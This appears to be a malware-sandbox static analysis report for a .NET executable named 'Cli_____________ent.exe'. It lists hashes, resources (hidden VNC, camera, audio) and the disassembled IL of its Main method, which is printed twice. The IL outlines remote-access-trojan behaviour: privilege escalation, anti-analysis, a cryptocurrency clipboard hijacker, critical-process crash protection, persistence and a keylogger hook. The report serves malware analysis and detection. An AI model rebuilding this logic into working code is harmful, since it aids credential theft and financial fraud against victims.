Suspicious
Suspect

04006b10303eeef3329c6f94eeb1d8b9

PE Executable
|
MD5: 04006b10303eeef3329c6f94eeb1d8b9
|
Size: 3.38 MB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Low

Hash
 Hash Value
MD5
04006b10303eeef3329c6f94eeb1d8b9
Sha1
1ccc3f6667292a02a3a6df7b4da2d8496ddb32d8
Sha256
b2906df5e807e9a98cfc4a816db16bbbec8fc95b1f21a264d0f67245e57dfb0b
Sha384
c05a0f246b7db79610a037845c198c5c7d1f780afd59a9856cc72d285c86a4ebd4fdccd01b1f45a06290cbb6c93cc59e
Sha512
c7f81aee2641e770d8f43376ca51c30717ecebac0877fef7b8ffbb93d2ee4df3059d79e57a6424142fe33829e16aa30af94306aa13ee462e2a89f3f99c071b03
SSDeep
49152:GyFtz61fEzTnnkNhiOJzlaAzU0vdBdo+6Wun+yPfr/NJJ:GoEEXnYhiOxG
TLSH
08F55A41ABE4DE1BE1BF2775A4F201011BB1E489A732D74B1798E6792C637406D0A3BF

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
File Structure
04006b10303eeef3329c6f94eeb1d8b9
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
Client.Properties.Resources.resources
hvnc
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
AForge.Video.DirectShow.Properties.Resources.resources
camera
[NBF]root.Data
[NBF]root.Data-preview.png
AForge.Video.DirectShow.VideoCaptureDeviceForm.resources
Microsoft.Win32.TaskScheduler.Properties.Resources.resources
Microsoft.Win32.TaskScheduler.TaskService.bmp
NAudio.Gui.PanSlider.resources
$this.DefaultModifiers
$this.GridSize
$this.Language
NAudio.Gui.VolumeSlider.resources
Newtonsoft.Json.Dynamic.snk
System.Data.SQLite.SR.resources
System.Data.SQLite.Resources.SQLiteCommand.bmp
System.Data.SQLite.Resources.SQLiteConnection.bmp
System.Data.SQLite.Resources.SQLiteDataAdapter.bmp
System.Net.Http.SR.resources
System.Net.Http.SysSR.resources
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Cli_____________ent.exe
Full Name

Cli_____________ent.exe
EntryPoint

System.Void Client.Program::Main(System.String[])
Scope Name

Cli_____________ent.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Cli_____________ent
Assembly Version

6.0.9.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

12606
Main Method

System.Void Client.Program::Main(System.String[])
Main IL Instruction Count

134
Main IL

ldarg.0 <null> ldlen <null> brtrue IL_0011: ldarg.0 ldstr br IL_0018: stloc.0 ldarg.0 <null> ldc.i4.0 <null> ldelem System.String stloc.0 <null> call System.Boolean Client.Helper.Methods::IsAdmin() brtrue IL_003D: call System.Boolean Client.Helper.MutexControl::CreateMutex() ldloc.0 <null> ldstr --flag call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_003D: call System.Boolean Client.Helper.MutexControl::CreateMutex() call System.Void Client.Program::ForceGetAdminAccess() br IL_004D: ldc.i4.s 26 call System.Boolean Client.Helper.MutexControl::CreateMutex() brtrue IL_004D: ldc.i4.s 26 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr 7n5rJCiEX08cdKRQsT6vxkbuaZ call System.String System.IO.Path::Combine(System.String,System.String) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldc.i4.1 <null> call System.Void System.Net.ServicePointManager::set_Expect100Continue(System.Boolean) ldc.i4 3072 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) ldc.i4 9999 call System.Void System.Net.ServicePointManager::set_DefaultConnectionLimit(System.Int32) ldc.i4.0 <null> stloc.1 <null> br IL_0093: ldloc.1 ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.1 <null> ldc.i4.1 <null> add <null> stloc.1 <null> ldloc.1 <null> ldsfld System.String Client.Settings::De_lay call System.Int32 System.Convert::ToInt32(System.String) blt IL_0085: ldc.i4 1000 call System.Boolean Client.Settings::InitializeSettings() brtrue IL_00B3: call System.Void Client.Helper.SetRegistry::InitRegistry() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Client.Helper.SetRegistry::InitRegistry() ldsfld System.String Client.Settings::An_ti call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_00CC: leave IL_00D7 call System.Void Client.Helper.Anti_Analysis::RunAntiAnalysis() leave IL_00D7: call System.Void Client.Helper.A::B() pop <null> leave IL_00D7: call System.Void Client.Helper.A::B() call System.Void Client.Helper.A::B() ldsfld System.String Client.Settings::Anti_Process call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_00F0: leave IL_00FB call System.Void Client.Helper.AntiProcess::StartBlock() leave IL_00FB: nop pop <null> leave IL_00FB: nop nop <null> ldsfld System.String Client.Settings::Enable_Clipper call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_016C: leave IL_0177 ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr btc ldsfld System.String Client.Settings::Clipper_BTC callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr eth ldsfld System.String Client.Settings::Clipper_ETH callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr ltc ldsfld System.String Client.Settings::Clipper_LTC callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr bch ldsfld System.String Client.Settings::Clipper_BCH callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Threading.Thread Finder.Helpers.ClipboardManager::MainThread dup <null> ldc.i4.0 <null> callvirt System.Void System.Threading.Thread::SetApartmentState(System.Threading.ApartmentState) callvirt System.Void System.Threading.Thread::Start() leave IL_0177: nop pop <null> leave IL_0177: nop nop <null> ldsfld System.String Client.Settings::BS_OD call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_0196: leave IL_01A1 call System.Boolean Client.Helper.Methods::IsAdmin() brfalse IL_0196: leave IL_01A1 call System.Void Client.Helper.ProcessCritical::Set() leave IL_01A1: nop pop <null> leave IL_01A1: nop nop <null> ldsfld System.String Client.Settings::In_stall call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_01B6: leave IL_01C1 call System.Void Client.Install.NormalStartup::Install() leave IL_01C1: call System.Void Client.Helper.Methods::PreventSleep() pop <null> leave IL_01C1: call System.Void Client.Helper.Methods::PreventSleep() call System.Void Client.Helper.Methods::PreventSleep() call System.Boolean Client.Helper.Methods::IsAdmin() brfalse IL_01D5: leave IL_01E0 call System.Void Client.Helper.Methods::ClearSetting() leave IL_01E0: ldsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 pop <null> leave IL_01E0: ldsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 ldsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 dup <null> brtrue IL_0202: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld Client.Program/<>c Client.Program/<>c::<>9 ldftn System.Void Client.Program/<>c::<Main>b__2_0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() call System.IntPtr Client.Features.KeyLog.Keylogger::SetHook() pop <null> call System.Void System.Windows.Forms.Application::Run() ret <null>
Module Name

Cli_____________ent.exe
Full Name

Cli_____________ent.exe
EntryPoint

System.Void Client.Program::Main(System.String[])
Scope Name

Cli_____________ent.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Cli_____________ent
Assembly Version

6.0.9.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

12606
Main Method

System.Void Client.Program::Main(System.String[])
Main IL Instruction Count

134
Main IL

ldarg.0 <null> ldlen <null> brtrue IL_0011: ldarg.0 ldstr br IL_0018: stloc.0 ldarg.0 <null> ldc.i4.0 <null> ldelem System.String stloc.0 <null> call System.Boolean Client.Helper.Methods::IsAdmin() brtrue IL_003D: call System.Boolean Client.Helper.MutexControl::CreateMutex() ldloc.0 <null> ldstr --flag call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_003D: call System.Boolean Client.Helper.MutexControl::CreateMutex() call System.Void Client.Program::ForceGetAdminAccess() br IL_004D: ldc.i4.s 26 call System.Boolean Client.Helper.MutexControl::CreateMutex() brtrue IL_004D: ldc.i4.s 26 ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldc.i4.s 26 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr 7n5rJCiEX08cdKRQsT6vxkbuaZ call System.String System.IO.Path::Combine(System.String,System.String) call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldc.i4.1 <null> call System.Void System.Net.ServicePointManager::set_Expect100Continue(System.Boolean) ldc.i4 3072 call System.Void System.Net.ServicePointManager::set_SecurityProtocol(System.Net.SecurityProtocolType) ldc.i4 9999 call System.Void System.Net.ServicePointManager::set_DefaultConnectionLimit(System.Int32) ldc.i4.0 <null> stloc.1 <null> br IL_0093: ldloc.1 ldc.i4 1000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.1 <null> ldc.i4.1 <null> add <null> stloc.1 <null> ldloc.1 <null> ldsfld System.String Client.Settings::De_lay call System.Int32 System.Convert::ToInt32(System.String) blt IL_0085: ldc.i4 1000 call System.Boolean Client.Settings::InitializeSettings() brtrue IL_00B3: call System.Void Client.Helper.SetRegistry::InitRegistry() ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) call System.Void Client.Helper.SetRegistry::InitRegistry() ldsfld System.String Client.Settings::An_ti call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_00CC: leave IL_00D7 call System.Void Client.Helper.Anti_Analysis::RunAntiAnalysis() leave IL_00D7: call System.Void Client.Helper.A::B() pop <null> leave IL_00D7: call System.Void Client.Helper.A::B() call System.Void Client.Helper.A::B() ldsfld System.String Client.Settings::Anti_Process call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_00F0: leave IL_00FB call System.Void Client.Helper.AntiProcess::StartBlock() leave IL_00FB: nop pop <null> leave IL_00FB: nop nop <null> ldsfld System.String Client.Settings::Enable_Clipper call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_016C: leave IL_0177 ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr btc ldsfld System.String Client.Settings::Clipper_BTC callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr eth ldsfld System.String Client.Settings::Clipper_ETH callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr ltc ldsfld System.String Client.Settings::Clipper_LTC callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Collections.Generic.Dictionary`2<System.String,System.String> Finder.Config::ClipperAddresses ldstr bch ldsfld System.String Client.Settings::Clipper_BCH callvirt System.Void System.Collections.Generic.Dictionary`2<System.String,System.String>::set_Item(System.String,System.String) ldsfld System.Threading.Thread Finder.Helpers.ClipboardManager::MainThread dup <null> ldc.i4.0 <null> callvirt System.Void System.Threading.Thread::SetApartmentState(System.Threading.ApartmentState) callvirt System.Void System.Threading.Thread::Start() leave IL_0177: nop pop <null> leave IL_0177: nop nop <null> ldsfld System.String Client.Settings::BS_OD call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_0196: leave IL_01A1 call System.Boolean Client.Helper.Methods::IsAdmin() brfalse IL_0196: leave IL_01A1 call System.Void Client.Helper.ProcessCritical::Set() leave IL_01A1: nop pop <null> leave IL_01A1: nop nop <null> ldsfld System.String Client.Settings::In_stall call System.Boolean System.Convert::ToBoolean(System.String) brfalse IL_01B6: leave IL_01C1 call System.Void Client.Install.NormalStartup::Install() leave IL_01C1: call System.Void Client.Helper.Methods::PreventSleep() pop <null> leave IL_01C1: call System.Void Client.Helper.Methods::PreventSleep() call System.Void Client.Helper.Methods::PreventSleep() call System.Boolean Client.Helper.Methods::IsAdmin() brfalse IL_01D5: leave IL_01E0 call System.Void Client.Helper.Methods::ClearSetting() leave IL_01E0: ldsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 pop <null> leave IL_01E0: ldsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 ldsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 dup <null> brtrue IL_0202: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld Client.Program/<>c Client.Program/<>c::<>9 ldftn System.Void Client.Program/<>c::<Main>b__2_0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart Client.Program/<>c::<>9__2_0 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) call System.Void System.Threading.Thread::Start() call System.IntPtr Client.Features.KeyLog.Keylogger::SetHook() pop <null> call System.Void System.Windows.Forms.Application::Run() ret <null>
04006b10303eeef3329c6f94eeb1d8b9 (3.38 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙